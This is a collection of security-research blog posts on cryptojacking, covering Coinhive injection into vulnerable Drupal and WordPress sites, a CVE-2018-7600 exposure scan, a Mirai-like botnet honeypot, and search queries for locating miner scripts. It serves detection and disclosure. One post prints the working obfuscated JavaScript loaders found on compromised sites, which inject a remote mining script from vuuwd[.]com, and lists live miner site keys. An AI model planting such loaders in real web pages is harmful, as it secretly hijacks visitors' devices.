How to stop cryptojacking and the theft of your computing resources

Cryptojacking is defined as hijacking your desktop / laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.

High CPU usage caused by cryptojacking
High CPU usage caused by cryptojacking can be observed using the Task Manager.

Mined hashes are sent via a WebSocket connection to a mining pool or a service provider such as Coinhive. While Coinhive remains the market leader, I previously documented how to find other forms of cryptojacking malware that have grown in popularity.

Coinhive websocket traffic shown in Fiddler.
Coinhive websocket traffic shown in Fiddler.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.


I recommend using MinerBlock to stop cryptojacking in your browser. This is an easy solution which requires no additional configuration out of the box. MinerBlock prevents cryptojacking using two methods: a frequently updated blacklist and detection of JavaScript executing cryptomining behavior. It’s available for Chrome, Firefox, and is open source.


Another effective method to stop cryptojacking is at the network level (firewall) to prevent the malicious code from reaching your endpoints. I recommend using the CoinBlockerLists for this purpose. These lists are constantly updated as new malicious domains are frequently found.

The lists are available in various formats to easily integrate with your existing solution. A FireHOL feed is also available. For MacOS users, this guide illustrates how the CoinBlockerLists can be implemented using firewall software Little Snitch. Other methods such as DNS filtering using Pi-hole can be used with the CoinBlockerLists.

Resource monitoring

As an independent security researcher, I don’t recommend a specific endpoint protection product for enterprises. Many antivirus / antimalware products such as Malwarebytes, ESET, Avast, Kaspersky, and Windows Defender will block most forms of cryptojacking and coinming malware.

Even with some form of AV protection, resource monitoring of your on-premise and cloud infrastructure is critical. High CPU usage over a sustained period of time is the most apparent indicator of compromise in cases of cryptojacking. Consuming excessive computational resources will increase your cloud service provider bills and energy (electricity) costs.

PRTG logo

Personally, I use PRTG for all my monitoring needs. Paessler recently published a case study featuring my use of the PRTG to monitor cryptojacking incidents. The impact of resource abuse and theft highlights the importance of monitoring. PRTG is free to use up to 100 sensors and can be downloaded here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I also coauthored a research paper, A first look at browser-based cryptojacking, for further reading on this topic.

As always, I’m most active on Twitter — follow me @bad_packets.

Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)

In my previous post, I detailed a large cryptojacking campaign that affected hundreds of Drupal websites. Multiple campaigns remain active today and are documented further in the latest SecurityTrails report. An important question was raised during my initial investigation — How many Drupal sites are vulnerable?

To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7. I promptly began scanning all the sites to establish which were vulnerable, and which were not.

I regarded sites that were using at least version 7.58 as not vulnerable to Drupalgeddon 2. This critical flaw is detailed in Drupal security advisory SA-CORE-2018-002 and has been assigned CVE-2018-7600.

Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.

Pie chart of vulnerable Drupal websites found

Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers.

Due to the highly critical risk of CVE-2018-7600 being exploited, the list of 115,070 vulnerable sites won’t be shared publicly. However, the list of sites has been shared with US-CERT and the Drupal Security Team. If you represent a national CERT/CSIRT and can offer assistance notifying affected organizations, please contact me.

2018-06-07 Update

The Drupal Security Team released a statement regarding my findings that questioned my methodology. While we know 115,000 sites are using outdated Drupal versions, based on the publically accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did — unless we perform the actual exploit.

Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version Drupal. Using an outdated content management system (CMS) is never best practice.

Another Drupal cryptojacking campaign discovered

While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.

When the campaign was first discovered, the domain name was using Cloudflare, so the real hosting provider was unknown.

The Coinhive site key used was “ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos” however this was later terminated. Because of this, the cryptojacking campaign operator switched to key “0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd” and resumed operations on the morning of May 31, 2018.

Twelve hours after my initial report, the malicious code was removed from and upgraderservices[.]cf was dropped by Cloudflare.

Once this was done, the hosting provider was revealed to be OVH. Simultaneously, the domain’s SSL certificate was switched to LetsEncrypt.

Hundreds of compromised Drupal sites found (again)

To locate compromised sites in this cryptojacking campaign, I scanned the nearly half million Drupal sites for upgraderservices[.]cf. Upon completion, 258 sites were found containing a reference to the malicious domain. I’ve created this spreadsheet listing all of the affected websites.

One of the affected sites in this campaign was the website of the Colorado Attorney General’s office.

Upon the discovery, I reported the site to US-CERT as I previously did for the US federal government sites found in the previous Drupal cryptojacking campaign. An incident number was assigned by the NCCIC Security Operations Center shortly thereafter.

I also setup PRTG monitoring to confirm when the site was remediated. This was done in less than 24 hours after my initial report.

Other websites in the campaign were noticed by Twitter users, including that of a food truck locating service.

Another affected website found was automobile parts manufacturer Magneti Marelli, a subsidiary of Fiat.

One example found in the campaign had upgraded their Drupal version to the latest version without removing the malicious content. As noted by the Drupal Security Team PSA , “simply updating Drupal will not remove backdoors or fix compromised sites” and further remediation steps are necessary.


Domain / URLs

Coinhive Site Keys

Closing Remarks

While the amount of vulnerable Drupal websites found is astounding, it’s good to see an even larger share of sites have patched the vulnerability. Hopefully this becomes a trend as more sites continue to be updated.

This latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale. If you’re a website operator using Drupal’s CMS, you need to update to the latest available version ASAP. The Drupal security team has prepared a guide of steps to take if your website has been compromised.

To stop cryptojacking in your browser, I recommend the extension minerBlock. The blocklist provided by CoinBlockerLists is an excellent resource to block coinmining malware and illicit cryptomining operations at the network level.

To learn more about my work and what others are saying about it, please visit this page.

As always, I’m most active on Twitter — follow me @bad_packets

Large cryptojacking campaign targeting vulnerable Drupal websites

Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. After I analysed the IoCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many discovered were government and university sites from all over the world.

Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.

Deobfuscated Coinhive malware
In each case, the malicious code was obfuscated and unreadable to humans.

Once the code was deobfuscated, the reference to “http://vuuwd[.]com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.

Domain used to inject Coinhive malware
The Coinhive implementation has small throttle configured to prevent 100% CPU usage.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.

After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd[.]com.

While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at-hand, vuuwd[.]com.

This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.

Now that IoCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using regular expression via PublicWWW’s snipex function.

Once I had the potential list of affected sites, I began scanning them for IoCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.

The big reveal

After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.

The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon.

Unique domains found by countryUnique domains found by hosting provider

Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.

Government sites affected

The National Labor Relations Board – US federal agency

Government of Chihuahua, Mexico

City of Marion, Ohio

Arizona Board of Behavioral Health Examiners

Social Security Institute of the State of Mexico and Municipalities

Turkish Revenue Administration – Aydın Tax Office

Procalidad – “The Project Improvement of Higher Education Quality” – Peru

Matzikama Municipality

UMBRIA Special Reconstruction Office


University / school sites affected

University of Aleppo

College of Biblical Studies

IOHANES – University of Balamand

Ringling College of Art and Design

Vidyalankar Institute of Technology

University of Batangas

Asia Pacific Institute of Information Technology (APIIT)

Management Development Institute of Singapore in Tashkent

Islamic Azad University of the Semnan branch

Tan Dan Secondary School


Other sites affected

The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.

2018-05-07 update

Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.

Malicious code found on Lenovo's portal page.
Malicious code found on Lenovo’s portal page.

Websites of UCLA and DLink Brazil were also found injecting Coinhive.

Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency
Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency.

For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of a trusted (CA) one. This could have easily (and freely) been done using LetsEncrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.

In addition to the self-signed SSL cert misstep, the reference to the non-secure version is included in some sites, such as the Office of Inspector General of the EEOC. This is yet another blunder that hinders the effectiveness  of this cryptojacking campaign as Coinhive does not load.

2018-05-16 update

This cryptojacking campaign continues as the malware host vuuwd[.]com has been restored with a new Coinhive site key.

The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story



https://vuuwd[.]com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")

var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();


Closing Remarks

We’ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website and you may need to take further remediation steps.

To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.

If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Recent Podcasts: Packet Pushers & The CoinSec Podcast

In the last month, I was invited to participate in two podcasts. The first was with Packet Pushers and the second with The CoinSec Podcast. This was definitely less hectic than doing a live interview on Canadian national television. In both shows, I shared my thoughts on cryptojacking and other security topics.

Packet Pushers Podcas

Packet Pushers logo

For the Packet Pushers podcast, I was a guest of Paessler. They are the company behind the enterprise and network monitoring application, PRTG. I’ve frequently mentioned PRTG in my tweets as it’s one of my favorite monitoring tools. One of the notable incidents I always like to reference is the Showtime Networks case. This was the first major case of cryptojacking affecting a well-known website and I was the first to document the incident.

PRTG allows me to monitor any website for Coinhive and other cryptojacking malware. This was valuable when the website of was also compromised. I was able to quickly and easily configure monitoring for the site.

In addition to the HTTP Advanced sensor, I use numerous other sensor types in PRTG including: SNMP, SSH, SSL, WMI, and many others discussed in the Packet Pushers podcast. Tune in to find out my favorites!

If you’re looking for the peer-reviewed research paper mentioned in the show, please visit my Publications page.

The CoinSec Podcast

The CoinSec Podcast logo

The second podcast I recorded was with The CoinSec Podcast. This show is about cryptocurrency and blockchain technologies with a focus on securing them. I had a great time discussing cryptojacking and other security issues affecting the cryptocurrency ecosystem.

Closing Remarks

While it’s a little nerve-wracking recording podcasts or television interviews, I always enjoy sharing my thoughts on cryptojacking and other security topics. If you’d like to learn more about my work and what others are saying about it, please see this page.

As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

My favorite website scanning services

In my research, I primarily use two publicly available website scanning services: and Sucuri SiteCheck. These tools allow me to quickly locate malicious code, which usually consists of Coinhive. However, many other types of cryptocurrency mining scripts are in use today.

While Coinhive remains the market leader for now, their dominance in the cryptojacking “industry” has declined in 2018.

I recently documented how to find cryptojacking malware and recommend it as an excellent use case for the services offered by PublicWWW.

Website Scanning Services

My first choice for scanning and archiving a website’s source code is I’ve provided many examples of how valuable this service in on Twitter.

Cryptojacking detection was added to early in January 2018. This enables you check if a website is engaging in malicious cryptocurrency mining, based on known signatures of cryptojacking malware (JavaScript).

It’s also a useful when you search for a URL to check if a website was previously infected.

Coinhive was found on the website of
The archived results show Coinhive was found on

In a recent example, the official website of travel guide book website Lonely Planet was compromised to run Coinhive. Despite numerous contact attempts, I received no confirmation or denial from Lonely Planet regarding this incident. However, based on the copy of the affected JavaScript library, Coinhive was removed sometime on or after March 7, 2018.

Another valuable tool for scanning websites for cryptojacking malware is Sucuri SiteCheck. Sucuri is a security company, owned by GoDaddy, that I have no affiliation with. I do however like using their website scanning service.

Sucuri SiteCheck

This scanning service helps you quickly locate the source of the malicious code. Other forms of malware can be detected by Sucuri’s scanner and isn’t limited to cryptojacking.

Sucuri SiteCheck

In this example, the website is infected with malware that redirects users to a tech support scam site. The offending code is easy to find thanks to the results presented by Sucuri. Sadly, this was only one of many Drupal sites that were recently exploited.

Closing Remarks

While Coinhive’s market share has declined in 2018, cryptojacking malware as a whole remains a persistent threat.

To stop cryptojacking in your browser, I recommend using a dedicated extension, minerBlock, to block cryptojacking malware.

If you use other forms of blocking, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Mirai-like Botnet One Year Review and a New Website!

In February 2017, I started my passive honeypot and began listening for all incoming network traffic. As the months passed, I saw numerous exploit attempts, constant port scans, and other suspicious traffic. It wasn’t until October that, with the help of Dr. Neal Krawetz, I started cataloging Mirai-like botnet traffic specifically.

What does Mirai-like mean?

Incoming scans from Mirai-like botnets have a very distinct fingerprint in the network traffic generated by infected hosts. The TCP sequence number will always equal the IP address of the target device. This intentional behavior is documented in the original Mirai source code, shown in the snippet below:

Snippet of Mirai source code

Typically, the target IP address is encoded in decimal (numeric) format. As the target IP changes, the Sequence Number of the traffic coming from the infected host will change accordingly as shown in the example below:

Example showing TCP Sequence Number = Destination IP address

Your logs may vary and instead record the sequence number in hexadecimal format. Either way, once converted to an IP address, the pattern is clearly established.

Dr. Krawetz shared his thoughts on this technique, “This is actually kind of brilliant. Each bot slings out packets and doesn’t store any information. When a response comes back, the botnet can identify the sender by the sequence number. ”

Once the fingerprint of the Mirai-like botnet was established, I was able to review the IP addresses found my logs for further patterns. Late in October 2017, I shared my findings of a botnet consisting of EnGenius routers.

Instead of continuing to isolate specific devices in the botnet and the volume of traffic generated, I began cataloging new unique IP addresses while noting the network provider (ASN) and country they came from. This allowed me to gauge the growth rate and estimate the size of active botnets. Subsequently, I started sharing my Mirai-like botnet statistics daily on Twitter.

One Year of Data Collected

New unique IP addresses seen Mirai-like botnet from 2017-02-19 to 2018-02-19

Reviewing the entire dataset I collected, the overall Mirai-like botnet volume averaged around 500 new unique IP addresses per day in March 2017 and steadily declined until September 2017. After this point, a surge in botnet activity was observed. The most new unique IP addresses I saw in a single day was 1,384 on November 29.

The explosion in activity was largely attributed to the Satori botnet which enslaved devices in Argentina, Egypt, Colombia, and Tunisia. This botnet grew exponentially after a zero day exploit was used to target Huawei HG532 routers. Numerous devices from Japan were also found after a UPnP exploit targeting Realtek devices was used.

During the height of the activity between November 22nd and December 7th, those countries accounted for a large share of the new unique IP addresses found.

New Unique IPs seen in Mirai-like botnet from 2017-11-22 to 2017-12-07 by Country

Similarly, network providers (ASNs) from Colombia, Egypt, and Argentina combined for 39% of all new unique IP addresses seen during this time period.

New Unique IPs seen in Mirai-like botnet from 2017-11-22 to 2017-12-07 by ASN

Growing Pains

The challenge of collecting and sharing the Mirai-like botnet data every day quickly became apparent. A publicly shared Google Sheet was not a long term option, so I asked my Twitter followers for assistance building a proper solution.

Alex Rhodes rose to the challenge and offered his time and expertise to build a database backend to store the data. He also designed and implemented a website for sharing the botnet data. Alex is software engineer in the aerospace industry and is currently working towards a Master’s degree in Cybersecurity at Syracuse University.

The new website is easy to configure and manage and I’m truly grateful for the finished product Alex has delivered.

New website:

The new website offers filtering options for every field, including IP Address, Country, ASN, and date range. It also expands on the features formerly offered in the spreadsheet, including the following lookups:

IP address (DomainTools)
ASN (Hurricane Electric BGP Toolkit)

In addition to the main page, which is updated daily, we can also filter by the top ASN and country for a specified time period. Using this, we can review the all-time leaders for the entire year of Mirai-like botnet data collected.

China dominated the count of unique IPs seen with 27,672. India and Brazil both had over 10,000 unique IPs each. Japan and Argentina were close behind with over 9,000 unique IPs each. Russia and the United States were also among the top 10 countries with 7,801 and 5,045 unique IPs, respectively.

Top 10 Country

Continuing the trend, network providers China Telecom and China Unicom led in total overall volume, combining for a total of 23,243 unique IPs seen. Coming in third place was Telefonica de Argentina with 7,576 unique IPs. Rounding out the top five network providers in unique IPs seen was Rostelecom (Russia) with 5,407 and Tigo Colombia with 3,301.

Top 10 ASN

During the one year of data collection, I saw botnet traffic from 179 of the 195 recognized countries in the world. IP addresses registered to 5,581 unique network providers (ASNs) were also observed. It was clear that Mirai-like botnet activity was truly worldwide phenomenon.

Closing Remarks

The unique IPs seen by my honeypot is only a tiny fraction of those participating in active botnets. In the case with Satori botnet, other security researchers estimate the total size peaked around 650,000 infected devices.

The data provided via the new website will remain free and open to the public. I will continue to update it daily with my latest available data.

Follow me on Twitter to receive my daily Mirai-like botnet statistics update of new unique IPs seen, top ten countries and top five ASNs seen in the Mirai-like botnet.

How to find cryptojacking malware

Cryptojacking malware continues to spread across the web, largely due to the popularity of Coinhive. Since Coinhive’s launch in September 2017, numerous cryptojacking clones have come about.

The tool I’ve chosen to locate them with is PublicWWW. This is a search engine that indexes the entire source code of websites. I previously offered a comparison of their dataset versus other providers in my discussion of Coinhive malware specifically.

In this post, I detail how to find websites containing Coinhive, Crypto-Loot, CoinImp, and deepMiner in PublicWWW.

Let’s jump in and see how many sites with cryptojacking malware we can find!


Before we review some of the knock-offs, let’s look at the most synonymous name with cryptojacking, Coinhive. Finding this malware is relatively easy and various queries can be used to locate it. The original Coinhive JavaScript library used in cryptojacking is “coinhive.min.js” and we can start by simply searching for that. It’s important to search for the entire name in quotes to ensure an exact match is returned by PublicWWW.

PublicWWW search for "coinhive.min.js"

Using this query, we find 34,474 sites. While this may seem like an astounding number,  it’s only a modest increase since I wrote about the 30,000 sites found back in November 2017.

While this list of sites is great for an overview of sites with Coinhive malware, we can dig even deeper into PublicWWW’s dataset to extract the Coinhive site key used on each site. This can be done using regex to extract the site key as a snippet: “coinhive.min.js” snipexp:|CoinHive.Anonymous\(‘?(\w{32})’|i

PublicWWW search for "coinhive.min.js" snipexp:|CoinHive.Anonymous\('?(\w{32})'|i

Once the Coinhive site key is extracted, we can export the results and correlate which sites are part of a cryptojacking campaign. This correlation of a small number of Coinhive site keys to hundreds and even thousands of websites was documented in my previous post.

Recently I found a large cryptojacking campaign targeting 5,451 WordPress sites. In each case, the JavaScript containing Coinhive was hidden via obfuscation.

Example site found in WordPress cryptojacking campaign
The obfuscated JavaScript code is illegible and must be deobfuscated first to be human-readable.

While PublicWWW can’t search within the deobfuscated JavaScript itself, we can find a way to work around it.

PublicWWW search for sites found in large WordPress cryptojacking campaign.

To search for the affected sites, the following query, graciously crafted for me by VriesHd,  was used:

“[\”(k” “\\x43\\x72\\x79\\x70\\x74\\x6f\\x6e\\x69\\x67\\x68\\x74\\x57\\x41\\x53\\x4d\\x57\\x72\\x61\\x70\\x70\\x65\\x72” snipexp:|(var _0x[0-z]{4}=)|

This query searches for the JavaScript function name used for the obfuscated code and then regex to extract a snippet of that name. This is useful to correlate the function name, such as “var _0xb70e” to the Coinhive site key used. Six unique keys were found to be used in this cryptojacking campaign:

Coinhive site key (function name)
DhGEVUgOoquJP68XByYLFs0nRVV4gq4J (0xb70e)
bbgnHTSmMLKUMaQzNa3Yfoul34A3cACd (0xbcba,0xe2f6)
hg9mNsA2DPkqe1F9yCUyWXggnDyrPqVW (0x1b00)
T6Oy0x11TMdeZRjy684Xow4GNBpb07SK (0xf80b)
OQoqVYH65ER2Eg2xcmoVtv4qrcHP2Z7G (0xe4d0,0xb765,0xcc28)
VW8fWIsg9hjn47qBdmb0jImf7pDHmU28 (0x8f35)

In some cases the same Coinhive site key was associated to multiple functions, shown above.


Crypto-Loot has steadily remained as one the most popular alternatives to Coinhive since its inception. Similar to Coinhive, Crypto-Loot doesn’t require any user interaction and can run steathlity in the background.

This is a prominent feature on Crypto-Loot’s marketing page, in addition to DDoS protection which is provided by Cloudflare.

Crypto-Loot is advertised to run secretly in the background while protected from DDoS attacks by Cloudflare.

Crypto-Loot uses two domain names for their cryptojacking operations:

These domains can be queried in PublicWWW to locate the affected sites, and similar to the Coinhive, we can use regex to extract the site key used in each using this query: “CryptoLoot.Anonymous” snipexp:|CryptoLoot.Anonymous\(‘?(\w{44})’|i

PublicWWW search for  "CryptoLoot.Anonymous" snipexp:|CryptoLoot.Anonymous\('?(\w{44})'|i

Searching for strictly the two domains used, we find a total of 2,057 sites with Crypto-Loot present.


CoinImp is a relatively new player in the cryptojacking game, however a large increase in the number of sites where it has been seen has been found recently.

CoinImp uses four domain names for their cryptojacking operations:

Interestingly, the reference to “” previously found in CoinImp’s documentation was quietly removed sometime after 2017-12-20 and replaced with “” as the illustrative example.

Screenshot captured of CoinImp's documentation page on 2017-12-20.
Screenshot captured of CoinImp’s documentation page on 2017-12-20.

Coincidentally, the most used CoinImp domain name,, has been found by PublicWWW on a whopping 3,745 sites.

PublicWWW search for

Since this was surprising number, I manually reviewed numerous sites and found that CoinImp had already been removed or another form of cryptojacking malware, such as Coinhive, had been placed. This leads me to believe the cryptojacking campaign perpetrator was using a short-lived method to place the CoinImp code.

Totaling the four CoinImp domain names used, we find a total of 4,119 sites.


Early in December 2017, I discovered a new form of cryptojacking malware called Minr. What differentiated this from the others is that it provided built-in obfuscation for its users. This wasn’t required however and many sites I found didn’t bother to use it.

Example site containing Minr malware
Example of a site containing Minr malware.

In addition, the domain names used by Minr were innocuous looking. The domain names also frequently changed, so anytime I shared an update it quickly became out of date.

Minr malware domains used on 2018-01-29

The domains used by Minr a week ago (shown above) have again have changed.

As of this writing, the active domains used by Minr in cryptojacking operations are:

Totaling the four Minr domain names currently used today, we find a total of 692 sites.


Unlike the other cryptojacking providers, deepMiner is self-hosted JavaScript. This means the code used to mine cryptocurrency is not hosted by a third-party service provider and instead placed directly on the website or domain controlled by the cryptojacking campaign operator. The repository of deepMiner’s source code can be found on GitHub.

While this might appear to be a roadblock in our search for sites containing, deepMiner, there is still a way to locate it. The secret in locating deepMiner lies in locating the function required for it to run, shown in the snippet below:

deepMiner code snippet

Now that we have this information, we can simply search PublicWWW for “deepMiner.Anonymous” to locate the affected websites.

PublicWWW search for "deepMiner.Anonymous"

This leads us to find 2,160 sites using deepMiner for cryptojacking purposes.

One site I found using deepMiner was a fake Chrome update website that advised users not to close the page. Meanwhile cryptojacking was happening in the background consuming 100% CPU of my test machine.

Fake Chrome update website running deepMiner malware
No, Chrome really isn’t updating.

Statistics Comparison

Coinhive remains the market leader for cryptojacking malware. However, many clones it inspired are showing exponential growth rates.

Websites found running Crypto-Loot, CoinImp, deepMiner, and Minr malware.

The four Coinhive clones discussed were found on a total of 9,028 websites. CoinImp had the largest market share at roughly 45% while Minr had the smallest at nearly 8%. Crypto-Loot and deepMiner shared the remaining portions at nearly 23% a piece.

Websites found running Coinhive and other cryptojacking malware.

However when compared to Coinhive by itself, the other cryptojacking malware providers only account for a modest 18% market share. I would expect Coinhive to remain in the top spot for the foreseeable future.

Closing Remarks

Coinhive is clearly the market leader when it comes to cryptojacking malware as it’s been found on nearly 40,000 websites.

For Chrome users, I recommend using a dedicated extension, minerBlock, to block cryptojacking malware. A Firefox version of this extension is available as well.

The cryptojacking malware discussed in this post is only a portion of what’s currently found in the wild. New variants are discovered frequently, which I share frequently on Twitter. You can also browse the CoinBlockerLists, which is constantly updated by ZeroDot1, where you can find hundreds of domains tied to cryptojacking malware.

The statistics shared in this post were generated from data provided by PublicWWW on 2018-02-07. They are subject to change as PublicWWW regularly updates their index.

Cryptojacking: 2017 Year-End Review

In 2017, we witnessed the rise of cryptojacking malware. A common target was compromised websites and their unsuspecting visitors.

How Cryptojacking Works
How cryptojacking works illustration by the European Union Agency for Network and Information Security (ENISA).

Cryptojacking begins after Coinhive or other malicious JavaScript cryptocurrency mining scripts are embedded in a compromised website. Unsuspecting visitors then begin mining the cryptocurrency Monero (XMR) in their browser.

This process is very intensive and can use all the CPU resources of the victim’s device. This leads to higher energy usage, rapid battery drain in mobile devices, and can cause damage from overheating.

Many well-known websites were compromised in 2017 with cryptojacking malware.

Showtime Networks

Coinhive found on Showtime's website
For an entire weekend in September, subscribers of Showtime’s video streaming website, Showtime Anytime, were subjected to cryptojacking.

Back in September, I was the first to document the cryptojacking incident of CBS’ Showtime Networks’ websites. Coinhive malware was found to be present on video streaming site for three straight days.

Showtime has refused to comment as to why the code appeared on their websites. While the Coinhive code was found in a New Relic code block, the company’s spokesman denied any responsibility in the matter.


Politifact's website hacked to run Coinhive malware
Hackers embedded Coinhive on Politifact’s website after compromising one of their AWS servers.

On October 13, Coinhive was found on the political fact-checking website Politifact. A compromised JavaScript library was found to be injecting the cryptojacking malware. The malicious code remained on the site for at least four hours before it was removed.

